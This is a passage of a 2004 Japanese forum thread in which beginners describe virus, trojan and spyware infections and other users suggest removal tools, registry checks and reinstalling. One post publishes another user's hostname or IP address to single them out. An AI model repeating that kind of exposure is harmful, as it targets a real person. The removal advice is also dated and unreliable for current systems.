これって悪徳業者から身を守ったと考えてよろしいのでしょうか?
会社名は・・・何とか有限会社でした」

221 :名無しさん@お腹いっぱい。:04/09/14 08:57:33
>>220
ワラタ でもまぁそんな感じつっても過言じゃねーな
Trojan Horse(=トロイの木馬)はウィルスの種類の通称なので、それじゃわからないよ
ノートンならシマンテックHPのウィルス辞典で調べてみるといいんじゃねーの?

222 :名無しさん@お腹いっぱい。:04/09/14 09:50:11
>215
フォルダオプションで「すべてのファイルとフォルダを表示する」にチェック
「保護されたオペレーティングシステムファイルを表示しない」のチェックを外す
で、検出されたファイルを削除

ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_SOBIT.A
ここみてレジストリ修復

それからアンチウイルスソフトくらい入れとけ

223 :名無しさん@お腹いっぱい。:04/09/14 13:30:40
>>220
219は、
>「検疫しました」と出たのですが、これはウイルスがPC内から消えたと捉えてよろしいのでしょうか?
の部分を聞きたいのでは?
「Troja Ho・・・何とか」がウイルスか否かではなく。

224 :名無しさん@お腹いっぱい。:04/09/14 13:34:38
つまり田中さんが帰ったかどうかを(ry

225 :名無しさん@お腹いっぱい。:04/09/14 13:36:17
>>223の解説が正しいものと仮定して

>>219
>これはウイルスがPC内から消えたと捉えてよろしいのでしょうか?
検疫しただけでは消えません。終了

226 :名無しさん@お腹いっぱい。:04/09/14 14:47:43
AVGで検索かけるとWarning: Hidden extension .exe
ってでて何度AVGで修復かけても引っかかるんですが
やっぱ感染してるんですか?

227 :名無しさん@お腹いっぱい。:04/09/14 15:04:58
http://66.102.9.104/search?q=cache:5skwHKDLmcQJ:canon-sol.jp/supp/df/wdft3111.html+%22Warning:+Hidden+extension+.exe%22&hl=ja&lr=lang_ja&inlang=ja

228 :名無しさん@お腹いっぱい。:04/09/14 17:31:59
【使用OS、WindowsUpdateの有無】 ME、していない
【オンラインスキャンの結果】
 (ウィルス名) TROJ_AOLPS.NM
 (場所)
  c:\ProgramFiles\InternetExplorer\○○.exe (すぐ消したので○○の部分は忘れました)
  c:\_Restore\TEMP\A0127243.cpy
【症状】 exeファイルは8/24に作成されていました。
     たまたまスキャンで見つけたので、自覚症状はありません・・・
【これまでにとった措置】
 exeファイルを削除しました。
 ウィルス検索でなかったので、似たような名前のTROJ_AOLERSERというのを参考に、
レジストリを調べましたが、特に異常はないようです。

ただ、c:\_Restore\TEMP\A0127243.cpy が”現在使用している”として削除できません。
何かいい方法はないでしょうか?


229 :名無しさん@お腹いっぱい。:04/09/14 18:02:56
>>228
コレ試した?

ttp://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=7261

230 :名無しさん@お腹いっぱい。:04/09/14 18:14:54
>228
> ウィルス検索でなかったので、似たような名前のTROJ_AOLERSERというのを参考に、

そういうときは似た名前じゃなくて同じウイルスの亜種を探すべし
そうするとNYとかNRとかでてくる…が、ろくな情報がないようだ
念のためWin.iniのRunもチェックして見れ

231 :228:04/09/14 18:17:03
>>229
ありがとうございます!無事削除できました!

>>230
さっそく調べてみます。

232 :名無しさん@お腹いっぱい。:04/09/14 20:08:48
【使用OS、WindowsUpdateの有無】 XP、最新
【スキャンした結果(ウイルス名・発見場所)】
Trojan.Ecure (C:\WINDOWS\system.exe)
Dialer.Trojan (C:\WINDOWS\seksdialer.exe )
Trojan.ByteVerify (C:\Documents and Settings\〜\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\loaderms.jar-108db11b-6384d35c.zip) 内の (Counter.class) )
の三つを検出。
全て自動的に削除。
【症状】
ウィルスはスキャンしても検出されなくなったのですが、フォルダを開いたり、
IEを起動すると一瞬で閉じてしまいます。ファイル・フォルダの検索も同様に一瞬で閉じます。
【これまでにとった措置】
駄目もとでシステムの復元をしましたが、何も変わりませんでした。
IEも開けないしファイルの検索も出来ないのでどうすればいいのやら・・・
Wordやら2chブラウザは普通に使えるのですが。

233 :名無しさん@お腹いっぱい。:04/09/14 21:57:02
スパイウェアかウィルスにやられたらしく、起動後すぐ固まってしまいなにもできない。
めんどくさいからリカバリーしようかと思ったら、CDも動かない。
どうすればよいんでしょ?

234 :名無しさん@お腹いっぱい。:04/09/14 22:18:22
>>233
セキュリティ初心者質問スレッドpart46
http://pc5.2ch.net/test/read.cgi/sec/1093131854/930

235 :名無しさん@お腹いっぱい。:04/09/15 01:19:35
>233
まるち

236 :名無しさん@お腹いっぱい。:04/09/15 11:57:48
>232
とりあえずTrojan.Ecureの処置として
・IEのスタートページを戻す
・HOSTSファイルの「127.0.0.1 localhost」以外の行を削除

これやってからセーフモードとネットワーク(だっけ?)で起動
これでIEが立ち上がるようならTrendmicroかMcAfeeでオンラインスキャン
スパイウェア駆除ツールもいくつか試してみる

237 :名無しさん@お腹いっぱい。:04/09/15 12:09:29
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
にある Microsoft Update Machine Winregs32 ってウィルス?

238 :名無しさん@お腹いっぱい。:04/09/15 13:55:10
>>237
オンラインスキャンしろ、ハゲ


ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_RBOT.DN

239 :名無しさん@お腹いっぱい。:04/09/15 14:55:41
I.E立ち上げるとorgazmってのが落ちてきてエロ画像行っちゃう。ヤフーに設定すると戻るけど再起動すると
また来る。プログラムのorgazm exe消しても直りません。どうしたら良いのでしょうか?


240 :名無しさん@お腹いっぱい。:04/09/15 15:02:46
>>239
アンチウィルスソフトいれるのと、スパイウェアのチェックをSpybot+Ad-awareSEでやってみろ

241 :239:04/09/15 15:33:06
スパイウェアって何でしょうか?すみません。教えてください

242 :名無しさん@お腹いっぱい。:04/09/15 15:33:22
>>239
エロ見すぎ
エロサイト見たら・・・助(ry


既出過ぎて、全部書くのマンドクセ

243 :239:04/09/15 15:59:52
携帯について調べてたら行ってしまいました。
すみませんがお願いです。

244 :名無しさん@お腹いっぱい。:04/09/15 16:10:57
>>243
( ゚Д゚)つhttp://www.google.co.jp/

245 :239:04/09/15 21:14:21
スパイウェアのチェックをSpybot+Ad-awareSEでしましたがダメでした。
どうすれば・・・・・

246 :名無しさん@お腹いっぱい。:04/09/15 21:22:59
>>245
コッチの方が情報あり

エロサイト見たら・・・助けて下さい!Part40
http://pc6.2ch.net/test/read.cgi/pcqa/1094644028/l50

まず、テンプレよ〜く嫁。読んで、実行して、それでもわからない場合に質問汁。
(ちょっと荒れ気味だ品・・・)



247 :名無しさん@お腹いっぱい。:04/09/15 22:51:18
僕の肛門がグラッカーにやられそうなのですが、どうすればいいですか?
一応ウイルスバスター2004と、スパイウェア除去ソフト、免疫ソフトを使っています。
最近、肛門のしまりが悪くなってきたので、侵入を許してしまうのではないかと、不安になってます。

248 :名無しさん@お腹いっぱい。:04/09/15 22:51:25
windows2000sp4

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductID
の値が「きみはじつにばかだな。」になっていました。
これはマイコンピュータ→右クリック→プロパティ→全般タブに表示される値の一つです。
いろいろ検索かけたりしたのですが見つからず、NAVで完全スキャンをかけても戻らず
これは何だったのでしょう?

249 :名無しさん@お腹いっぱい。:04/09/15 22:53:08
>>247
まず、病院で肛門を縫ってもらいましょう。
そうすると、強制オンラインから、強制オフラインになります。

250 :156:04/09/15 23:13:26
あつかましいお願いで申し訳ありませんが、
どなたか教えてもらえませんか?友人からの依頼品などもあり
どうしてもせっぱつまっているのです。
本当に感謝しますので、どうかお願い!

251 :名無しさん@お腹いっぱい。:04/09/15 23:20:42
>>250
厚かましいとかではなくてさ
ここの人と全然関係ない沢山の
人達が被害を被ることになるので
教えられないと思うよ

252 :名無しさん@お腹いっぱい。:04/09/15 23:23:33
これって事実上の荒し依頼だよな?>スパム
削除依頼+アク禁対象じゃないか?

253 :名無しさん@お腹いっぱい。:04/09/15 23:28:12
>>250
カエレ
できもしないのに、他人の依頼を受けるからだ
自分で何とかしろ

254 :名無しさん@お腹いっぱい。:04/09/15 23:56:32
教えて下さい。
ヤフーのフリーメールの方に、度々
W32.Netsky.P@mmという名前のウイルスを含んだメールが
添付されて送りつけられます。
受信拒否にしても、迷惑メールフォルダの方に受信されてしまいます。
どうしたら、よいでしょうか?教えて下さい。


255 :名無しさん@お腹いっぱい。:04/09/16 00:05:21
>>254
>どうしたら、よいでしょうか?教えて下さい。
削除する。

256 :名無しさん@お腹いっぱい。:04/09/16 00:09:15
>>255
いえ、あのぉ 受信拒否できるようにするには、
何かソフトを入れれば、大丈夫ですか?

257 :名無しさん@お腹いっぱい。:04/09/16 02:35:53
【使用OS、WindowsUpdateの有無】
XP pro Ver2002 SP1適用 当時FWは切っていました。。
現在は反省してFWかけています

【使用AntiVirus、Updateの有無】
ノートン アンチ ウィルス 9/14日付けの物に更新

【スキャンした結果(ウイルス名・発見場所)】(オンラインスキャンしたならその結果も)
合計25個程度同時にかかっていたので全て把握できませんでした
大抵の物は既に駆除出来ていると思います
現在自覚のある中でかかっているらしきものは「W32.Klez.gen@mm」、
「W32.ElKern.gen」の2種です

【症状】(具体的に、分かる限りすべて書くこと。何をしたらそんなことになったのかも)
最初はデスクトップのゴミ箱のアイコンを右クリックするとエクスプローラがフリーズする、
タスクマネージャが一瞬立ち上がった後すぐに自動的に終了してしまう、
MSNメッセンジャやIRCが今までにないような頻度で切断される という感じでした
その後症状を元にググって見た結果、klezというのに類似しているように見受けられたので
シマンテックのサイトの下記「W32.Klez駆除ツール」を実行すると
ttp://www.symantec.com/region/jp/sarcj/data/w/w32.klez.removal.tool.html
「Neither W32.Klez.gen@mm nor W32.ElKern.gen were found on your computer.」
との結果が出て、その後それまでは普通に実行できていたはずのレジストリエディタまで
立ち上がらなくなりました

原因のほうはいつの間にかなってしまったので把握できていません

【これまでにとった措置】
NAV、AD-awareでのスキャン、klez用駆除ツール

自分ではこれで精一杯でした。。
どうかお知恵をお貸し下さい

258 :257:04/09/16 02:40:45
すいません
記載に漏れがありました
WinUpdateも最新のまで入れてあります

このWinUpdateする際にも、何度自動更新しても同じファイルを落とし続けるので
MSのサイトから直接ファイルをDLして手動インストールしてみたところ
インストール実行中にウィザードが強制終了してしまっていました
その問題はセーフモードでインストールを実行することで回避出来ました

259 :名無しさん@お腹いっぱい。:04/09/16 02:58:37
皆さん相談に乗ってください。
知り合いがパソコンを買う予定なのですが、金が無いらしいので、
中古のOS 2000 良くてもペン3の500とか、メモリもまあ128とか256ぐらいになると思います。
ネットと、メールぐらいしかしないらしいので、それぐらいでも十分かなーと思いますが、
ノートンとか、バスターを入れると、スペック的な厳しさの心配があり、
さらにパソコン触った事無いぐらいの人なので、設定の仕方とかも良く分からなそうです。

だからセキュ的には、やっすいルーターと、プロバイダーのウィルスチェックで何とかなるかなーと思ってるのですが、
甘いっすかね?

260 :名無しさん@お腹いっぱい。:04/09/16 03:15:00
>>257
「Neither W32.Klez.gen@mm nor W32.ElKern.gen were found on your computer.」
これはKlezが駆除できたというメッセージ

メッセンジャー・IRCの症状はKlezだろうけど、エクスプローラやタスクマネージャのほうは
おそらくトロイによるものだと推測
25個もの感染があったなら、その中にはレジストリを改変するものも含まれてたんじゃないかな
そういう場合は手動で書き換えられたレジストリを元に戻さなければいけないわけで

もう原因が特定できない状態だから、OS再インストールしたほうが早い
この板のHijackThisスレかPC初心者のエロサイトスレでログを見て貰うという手もあるけど、
それで元通りになるとは限らない
無駄に時間使うだけになるかもしれないし

261 :名無しさん@お腹いっぱい。:04/09/16 03:26:29
デスクトップの背景が蓮画像になったのですが、
こちらで質問させてもらってよろしいでしょうか?
All userのスタートアップの所に”      .exe”という
怪しいファイルを見つけたのですが、これが犯人と思ってよろしいのでしょうか?
ちなみにwinnyは使ってないです。
オンラインスキャンをしても反応しませんでした。
ググるためのヒント(正式名称)などを教えていただけたらと思います。

262 :名無しさん@お腹いっぱい。:04/09/16 03:27:32
>>259
甘い
初心者に限って何でもパカパカリンク踏むもんだし、
ウィルス感染は何もメールだけに限ったものではない
設定の仕方も解らない人間なら、ネットに繋いだ瞬間にsasser等に感染するのがオチ

感染したら本人だけの問題ではない、周りも迷惑こうむるし

そのスペックなら厳しいけども、ノートン、バスターともに入れられないわけじゃないでしょ
私が最初に使ってたPCがそれとよく似たスペック(OS2000 K-6 550 メモリ256)で
Norton Anti Virus と Black ICE が入ってた

男性ならエロサイト巡りは絶対と言っていいほどするだろうし、
少々の重さを我満してもセキュリティ対策は取っておいたほうがいいと思う

263 :名無しさん@お腹いっぱい。:04/09/16 03:32:39
>>259
甘い。
アンチウィルスソフトも、ファイヤーウォールも、スパイウェア対策ソフトも
全部無料で手に入れられる時代だ。最低限でもそのぐらいは入れた方がいい。
セキュリティ板のスレッドを回って情報を集めた方がいいよ

264 :名無しさん@お腹いっぱい。:04/09/16 03:33:24
>>261
キンタマかぬるぽだと思うけど、ダウンロード板のこのスレ読んだほうが情報多いと思う

【警報】Winnyを狙ったワーム・ウイルス情報 Part26
http://tmp4.2ch.net/test/read.cgi/download/1094872215/

今この時間このスレにいるのは、夜中に目が覚めた私ひとりだし、私は治し方を知らないから

265 :名無しさん@お腹いっぱい。:04/09/16 03:39:58
>>264
どうみても>>261はネタだろ。本当に知らなかったらこんな事書かない

>ちなみにwinnyは使ってないです。
>ちなみにwinnyは使ってないです。
>ちなみにwinnyは使ってないです。

Winnyやってないなら訳のわからないものをダウンロードするからだ
スレ違いだと最初からわかってるか、nyやってて感染して聞いてるだけだろ
ここでは誰も回答する気も起きないと思うよ、あきらめな

266 :名無しさん@お腹いっぱい。:04/09/16 10:14:31
>>261
蓮の犯人はここに登録されているファイルです
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
: imjpmig

267 :名無しさん@お腹いっぱい。:04/09/16 10:18:15
>>261
ちなみにOfficeのIMEのキーを使っているから、Microsoft Officeをインストールしている人しか
実害は被りません

268 :名無しさん@お腹いっぱい。:04/09/16 10:54:53
>>257
>合計25個程度同時にかかっていたので全て把握できませんでした

NAVによってスキャンしたのなら
レポート→活動ログ→Norton AntiVirus→脅威警告
にそのときのログが残っているはずだけど。

269 :261:04/09/16 11:19:34
>>267
皆さん、回答ありがとうございます
実害とありますが、winnyを狙ったものならば、
使ってなければ影響は無いのでしょうか?

270 :名無しさん@お腹いっぱい。:04/09/16 11:38:27
>>269
>>264のスレ、ダウソ板http://tmp4.2ch.net/download/


271 :250:04/09/16 11:51:19
違う違う!
ここにはすごいスキルのありそうな人が
多いのでお願いしているのです。
ぶっちゃけた話、自分の周りに東大の工学部を
出ているような人は誰もいません。
でもここにはそれ以上の頭脳とスキルを持ったツワモノが
潜んでいると思うのです。何故なら
このお願い事は東大の工学部でも難しいレベルだと思うからです。

272 :名無しさん@お腹いっぱい。:04/09/16 11:59:32
>>271
もう秋田
つまらないよ、そのネタ

273 :名無しさん@お腹いっぱい。:04/09/16 12:07:08
>>271
火星大学あたりでスカウトして恋♥
あした日の出桟橋から船が出るから。
チケットはコンビニで買える

274 :名無しさん@お腹いっぱい。:04/09/16 13:22:03
1.島を手に入れる
2.独立を宣言する
3.国外へのインターネット回線を引く
4.メールサーバを島に置く
5.メールを出す

275 :271:04/09/16 14:07:48
>>274
なるほど!
それなら私にも出来そうですね。
目から鱗が落ちました。
ありがとうございました!

276 :名無しさん@お腹いっぱい。:04/09/16 16:05:36
Symantec NortonInternetSecurity2005日本語版ついにアクチ機能導入?
http://www.symantec.com/region/jp/news/year04/040916c.html

>また、ユーザーを海賊版コピーや偽造ソフトウェアから守るため、
>ノートン 2005 シリーズの製品より製品のアクティブ化の技術が搭載
>されています。

277 :名無しさん@お腹いっぱい。:04/09/16 18:02:20
海賊版コピーからユーザーを守るってどういうこと?

278 :名無しさん@お腹いっぱい。:04/09/16 18:18:58
>>277
http://pc5.2ch.net/test/read.cgi/sec/1095226174/30-

279 :名無しさん@お腹いっぱい。:04/09/16 18:20:41
教えて下さい。
うちのPC、夜中になると勝手に家中動き回ってるみたいなんですが
どうしたらいいでしょうか?

280 :名無しさん@お腹いっぱい。:04/09/16 18:33:15
≫279
縛っとけ!

281 :名無しさん@お腹いっぱい。:04/09/16 18:46:40
>>279
夢遊病の癖があるようですね
初期出荷不良です サポートに電話して下さい

282 :名無しさん@お腹いっぱい。:04/09/16 18:57:27
相談させてください。ウィルスメール(W32.Netsky.P)が日に10通ちかく
届くようになり、ヘッダからプロバイダを割り出して、ヘッダ情報を添えて
該当プロバイダに連絡しました。

返事がきたのですが、
・同一IPを多くの人が使っているからウィルス感染者はわからない
・このヘッダも偽装かもしれないから信用できない
・全ユーザーにウィルスに気をつけるよう注意を促すようにはする

ということで、何の対処もしてもらえないようです。
こういう無責任プロバイダを取り締まってくれるような団体ってないですかね?

283 :名無しさん@お腹いっぱい。:04/09/16 19:02:48
10通/日程度で騒ぐことか?


284 :名無しさん@お腹いっぱい。:04/09/16 19:18:32
>>280
GJ! (・∀・)イイ!!

(´-`).。oO( なんでメアドだろう… )

285 :名無しさん@お腹いっぱい。:04/09/16 19:53:34
そこにメール欄があるからじゃない?

286 :あぼーん:あぼーん
あぼーん

287 ::04/09/16 21:06:04
c124248.net21845.cablenet.ne.jp

↑厨のip

288 :名無しさん@お腹いっぱい。:04/09/16 21:38:14
質問させてください。この11月でセキュリティーソフトの更新サービス
が切れるのですが、今使ってるのがノートンインターネットセキュリティ
2003なんで新しいパッケージのやつに買い換えなきゃどうなのか悩んでます。
そこらへんに詳しい方どうしたらいいかおしえてください

289 :名無しさん@お腹いっぱい。:04/09/16 21:51:14
>>288
更新サービスが切れてから後はどうしたいの?
ノートンを正規に使い続けたいのなら買わなければいけないけども。


290 :名無しさん@お腹いっぱい。:04/09/16 21:57:59
>>289
サービス延長キーを買うか、2005に買い換えるか、どっちがいいんでしょうか?
2003でも問題なければまた延長キーを買おうと思ってます。更新が2回目だったので
皆さんどうされてるのかと思いまして。

291 :名無しさん@お腹いっぱい。:04/09/16 22:09:24
>>290
どうせ買うなら 2005にしてみれば。

292 :名無しさん@お腹いっぱい。:04/09/16 22:29:27
Windows 2000 で、ログイン画面が逆さまになって、ログインするとデスクトップも逆さまになってしまった。
こんなウイルスある?

293 :名無しさん@お腹いっぱい。:04/09/16 22:32:15
すいません、ウィルスで教えてもらいたいのですが、
さっきNorton AntiVirusでwinfix3というウィルスを発見したんです。
強制終了すれば消せると思い、
Alt+Ctrl+Deleteでwinfix3のタスクマネージャでプロセスを終了したんですが、
winfix3が起動していて消せません;-:
どうやったらwinfix3を消せるんでしょうか?
あとwinfix3に関係しているファイルがあるんでしょうか?
消したいので教えてください!お願いしますm_m

294 :名無しさん@お腹いっぱい。:04/09/16 22:32:31
>>292
なんだか楽しそうねw
私は聞いたことないな

295 :名無しさん@お腹いっぱい。:04/09/16 22:34:51
>>292
ウイルスじゃねえけどそういうことはある
原因はなんだっけな

296 :名無しさん@お腹いっぱい。:04/09/16 22:40:28
>>293
http://www.symantec.com/region/jp/avcenter/venc/data/w32.randex.gen.html

297 :名無しさん@お腹いっぱい。:04/09/16 22:49:12
>>292
こんなのがあった
http://www2.sega.co.jp/bbs/article/p/pc/351/qpycxe/miikkz.html#miikkz

そういう機能が付いたPCなのかもしれない
とりあえず取説読んでみたほうがいいかもね

298 :292:04/09/16 23:32:52
>>297 グラフィックコントローラ(Intel)にそういう機能が有るけど設定ボタンが押せない状態になっていて切り替えられない。
ウイルスじゃ無さそうなので、別の所で聞いてみます。


299 :名無しさん@お腹いっぱい。:04/09/17 01:16:52
すいません、質問させてください
さっきトレンドマイクロのオンラインスキャンしたところ
WORM_SDBOT.ORってのが発見されたんですけど、駆除できません。
このSDBOTの亜種だと思ってググってみても、ORというのは発見できませんでした。

駆除のための助言をいただけませんか?

300 :257:04/09/17 01:27:17
遅レスすいません
いろいろ試してたものでレス遅れました

>>260
OS再インストールも考えてみます。。

>>268
レポートは白紙でした。。

NAVだけじゃ不安になったのでバスターのオンラインスキャンもやってみた結果
新たに「BAT_SASSER.A」「WORM_WOOTBOT.G」「REG.LOWZONES.A」というのにも
かかってしまっていたみたいでした

その後ベンダサイトでSASSER用駆除ツールをDL、実行等他の作業をしていて
全部消えたか確認のために再度オンラインスキャンを実行してみると
さっきまでは存在していなかった「TROJ_BOTIRC.A」というトロイが新たに発見されてしまい
そのトロイの解説には「侵入方法:メール送信やネットワーク越しの感染などはありません。
人間によるファイルの受け渡しによってのみ他のコンピュータに頒布されます。」
とあるのですが1回目のスキャンから2回目のスキャンの間までにDLしたのはSASSER用駆除ツールのみで
他に他人からファイルの受け取りなどはしていませんでした

そのほかにAPC.exe、net.exe、pp1.exe、soundm0n.exe、cmd.exeといったプロセスが
大量に立ち上がりパフォーマンスが著しく低下しだしてしまいます
APCなどは何度消しても復活してしまいます。。

どこからかバックグラウンド上で勝手にウィルスを収集するウィルス などは
あるのでしょうか?

301 :名無しさん@お腹いっぱい。:04/09/17 01:27:34
>>299
最近パターンファイルに載った奴で、解説はまだできてないんだろう。
これを機に常駐のアンチウイルスソフト買うのが良いと思うが、どうか?

302 :名無しさん@お腹いっぱい。:04/09/17 01:43:21
>>300
よくあるのかどうかしらんが、俺も似たようなことがあった。
トロイAにウイルスBを感染させると、1回目のスキャンでは
ウイルスB検出駆除、2回目のスキャンでトロイA検出隔離
ってな感じ。
でもトロイだと何らかの形で実行してもらわんとなー。なんで
そんな怪しげなプロセスが発生するのかワカラン

303 :名無しさん@お腹いっぱい。:04/09/17 04:31:42
>>300
ありえる。というかもしかしたらウィルスじゃなくスパイウェアかもね。
Ad-awareはやっているみたいだが、これはAd-awareSEの最新の定義でやってるか?
Spybotは入れてみてやってみたか?

ファイヤーウォールソフトは入れているか?
(バックグラウンドで勝手に収集するウィルスなら、ファイヤーウォールで
「ネットに接続しようとしていますが・・・」と出るはず)

常駐のアンチウィルスソフトは最新の定義のNAV2004が入っているんでしょ?

304 :名無しさん@お腹いっぱい。:04/09/17 06:59:41
>>300
スパイウェアの親玉がいる、たぶん
ここのテンプレ実行、スレ移動したほうがいいかも

エロサイト見たら・・・助けて下さい!Part40
http://pc6.2ch.net/test/read.cgi/pcqa/1094644028/


305 :名無しさん@お腹いっぱい。:04/09/17 13:07:14
>>287
節しろや  ( ゚∀゚)σ)´Д`)

306 :名無しさん@お腹いっぱい。:04/09/17 18:38:03
皆さん助けてください!
インターネットを開いたらいつもはyahooのはずが、変なサイトがいっぱい出てきて直りません!
インターネットオプションから直そうとしても灰色になっててクリックできません!
どうしたらいいんでしょうか!? どうか教えてくださいお願いします!



307 :マンド゙クセ コピペ:04/09/17 18:54:22
>>306
コッチの方が情報あり

エロサイト見たら・・・助けて下さい!Part40
http://pc6.2ch.net/test/read.cgi/pcqa/1094644028/l50

まず、テンプレよ〜く嫁。読んで、実行して、それでもわからない場合に質問汁。

308 :名無しさん@お腹いっぱい。:04/09/17 20:55:00
最低でもOSがセーフモードで動かないと、ウィルスソフト買っても意味ないでしょうか?
それと、ファイアウォールの良し悪しというのはあるのですか?
あるとすれば、どこで判断するのですか?

309 :257:04/09/17 22:16:08
>>303
Ad-aware、NAVともに最新の物になっています
Spybotも試した結果CnsMin等が引っかかりましたがそちらは駆除できたみたいです
FWはWinの純正?のものはかけてあるとおもいます

>>308
ではそちらのスレでお世話になってきます

レス下さった方々ありがとうございました

310 :名無しさん@お腹いっぱい。:04/09/18 02:48:48
>>308
駆除ソフトは買って損することはないと思う。
よくわかんないなら市販されてる有名企業の物をかっとけ

311 :名無しさん@お腹いっぱい。:04/09/18 04:51:26
質問です。

某サイトを知り合いが踏んでPCがおかしくなったらしいので
自分がチェックしたところ

MHTMLRedir.Exploit
Trojan.horse
Download.trojan
Download.ject
Trojan.ByteVerify

が検出されました。知り合いいわく
「画面が青くなり、〜〜%と表示される(自分もここまではなりました)
そしてPCを立ち上げると、デスクトップに変なショートカットが出来てて、デスクトップまでたどり着いた瞬間に
特定のプログラムを実行したと思ったらフリーズしてしまう」らしいんです。IEのブラウザを大量に開いてるのかも
と自分は思ったのですが。

でシマンテックで調べると、
Trojan.ByteVerify
これの症状が発生してるのかなと思ったのですが、この場合どう対処すれば
いいでしょうか?OSはMEです。

312 :名無しさん@お腹いっぱい。:04/09/18 05:45:41
質問させてください。office製品を開こうとするとインストーラーの準備を開始してしまいます。
昨日まで使えたワードやエクセルが使えません。シマンテックでウィルス感染を見つけ削除はしました。
そんなウィルスあるのでしょうか?調べたけどなさそうなんですが。

313 :名無しさん@お腹いっぱい。:04/09/18 06:53:51
Norton AntiVirusは最新版です。WinXPSP2。
>>311さんの例と同じくリンクを踏んで
警告が出て遮断できたかと思ったのですがチェックしてみると
Trojan.horse
Trojan.ByteVerify
Bloodhound.Exploit.6
が検出されました。

システムの復元を無効にしてから、検疫項目の削除をしたのですが、
http://www.symantec.com/region/jp/sarcj/vinfodb.html#threat_list
ここで名前を探してみましたが、レジストリについて触れられていないモノは
レジストリをいじる必要はないのでしょうか?
削除できているか不安なのでまだ再起動はしていません。
どなたか教えて頂けると助かります。

314 :名無しさん@お腹いっぱい。:04/09/18 07:38:21
>>311 >>313
どうせ両方とも常駐するアンチウィルスソフト入れてないんだろ?
これを機に入れておけ、でファイナルアンサー。無料のもあるんだから調べてみろ。

>>312
OfficeUpdateの関連じゃねーの。CDがあれば問題はないはず
割れユーザーなら残念でした

315 :名無しさん@お腹いっぱい。:04/09/18 08:26:47
アンチウィルスソフトというのはNorton Internet Securityとは
全く別物なんですか?
今までそれがあるから大丈夫だと思っていたのですが。。

316 :名無しさん@お腹いっぱい。:04/09/18 09:16:59
>>315
Norton Internet Securityはアンチウイルスソフトだよ。
ただし過信は禁物。

レジストリは記述が無いなら大丈夫だと思うが、念の為再スキャンしとけ。
それとWindowsUpdateはきちんとやっとけよ。

317 :名無しさん@お腹いっぱい。:04/09/18 09:19:28
>>316
ありがとうございます。
レジストリ見てみたもののそれらしきものはなさそうなので
再スキャン&WindowsUpdateして再起動してみます。

318 :314:04/09/18 09:37:17
あ、ごめん。もろに>>313でNIS入れてますって書いてあったな
>>314の書きこみは無視しちゃってくれ

319 :名無しさん@お腹いっぱい。:04/09/18 13:52:20
http://visualtracking.symantec.com/vt_main.asp?productid=nis2004&langid=jp&venid=sym&go=210.148.115.140
最近よくここからウィルスが来るんですがどうしたら良いんですか…。

320 :名無しさん@お腹いっぱい。:04/09/18 17:21:48
すいません ウイルスが感染して悩んでします 治し方を教えてください

xpで起動してログインすると
ノートン:ウイルス警告 Back。Aent。Bに感染
RUNDLL:指定されたモジュールが見つかりません
Online Windows Spy Test:
Warning!
Welcome The System Perfoemance Wizart:
サーバーが見つかりません:20個開きます
Already running!!!

システマックの駆除ツール
CWShredder
a2
Spybot
HijackThis
はすべて試してみましたが 駆除できません

どうすればいいのでしょう?







321 :名無しさん@お腹いっぱい。:04/09/18 18:26:29
再インスコ

322 :320:04/09/18 18:49:01

すいません 再インストールってやってことがないのですが 初心者でも簡単なんでしょうか
パソコンはドスパラで買って一応組み立てアニュアルという冊子は付いてますが いまいち 自信がありません

323 :名無しさん@お腹いっぱい。:04/09/18 19:02:02
ヒタチのプリウスを使っていますが、立ち上げたあと黒い画面の上の方に白いハイフンが点滅したまま次の画面になりません。ウイルスでしょうか。またどうしたら治りますでしょうか。よろしくおねがいします。

324 :名無しさん@お腹いっぱい。:04/09/18 19:17:20
>>322
いい機会だ
やれ

>>323
初心者板に逝け

325 :名無しさん@お腹いっぱい。:04/09/18 19:35:32
マイクロオンラインスキャンで TROJ_ISTBAR.Wというウィルスが見つかったので、
ファイルを削除してスキャンしてみた所、
何度検索してもDownload programfile
CONFLICT.1¥STactiveX.dllと
ISTactivex.dllというファイルが検出されます。
フォルダ内を見ても、この2つのファイルは見つかりません。
どうすれば、削除できるのでしょうか?
どなたかご回答よろしくお願い致します。

326 :名無しさん@お腹いっぱい。:04/09/18 19:38:13
マカフィーの体験版を使用してるのですが、「ウィルススキャン」をインストールしてから
「パーソナルファイアウォールプラス」をインストールすると、途中で停止するのですが
どうすればよいでしょうか?
インストール中”application ・・・”というところで停止してしまいます。
よろしくお願いいたします。

327 :名無しさん@お腹いっぱい。:04/09/18 20:15:03
>>325
すべてのファイルを表示にしてる?

>>326
スレ違い

がんばれマカフィーPART10
http://pc5.2ch.net/test/read.cgi/sec/1090040195/


328 :320:04/09/18 21:04:40
すいません CDROMで再インストールしてみましたが 感染状態は変わりませんでした
やはり ハードディスクの初期化をしなければいけないのでしょうか
一応 グーグルで検索してみたのですが 使っているハードディスクの初期化のやり方がわかりません
どなたか教えてください

329 :ぼる ◆yBEncckFOU :04/09/18 21:06:29
>>325
http://pc5.2ch.net/test/read.cgi/sec/1087290865/295
http://pc5.2ch.net/test/read.cgi/sec/1087290865/299

330 :名無しさん@お腹いっぱい。:04/09/18 21:10:31
>>328
駆除ツール使ったって書いてあるけど、指示どおりに使った?
http://www.symantec.com/region/jp/avcenter/venc/data/jp-backdoor.agent.b.removal.tool.html
それから、こっちのデータベースの手動駆除方法は試してみた?
http://www.symantec.com/region/jp/avcenter/venc/data/jp-backdoor.agent.b.html

初期化だのは最終的な手段だよ、まずは普通に駆除するのをちゃんと試してみろ

331 :320:04/09/18 21:22:29
駆除ツールをやってみても not been found と出ました
手動法もセーブモード 一応やってみましたが やはり かわりなしです 
DB化されたリストも スキャンログからコピー&ペーストで 一個一個検索して 怪しいものは消していきましたが
それも かわりなしです


332 :名無しさん@お腹いっぱい。:04/09/18 21:36:46
>>331
ウィルスに感染しているファイルを手動駆除できないのかどうか?
手動駆除方法でレジストリに残っているものはないかどうか?
再度最新の定義のノートンで全てのファイルをスキャンしてみて、
ウィルスは見つかるかどうか?
Ad-awareSEは試してみたかどうか?


333 :名無しさん@お腹いっぱい。:04/09/18 21:43:31
感染したかわからないのですが、質問です。

脳豚先生がupdateできなくなりました。
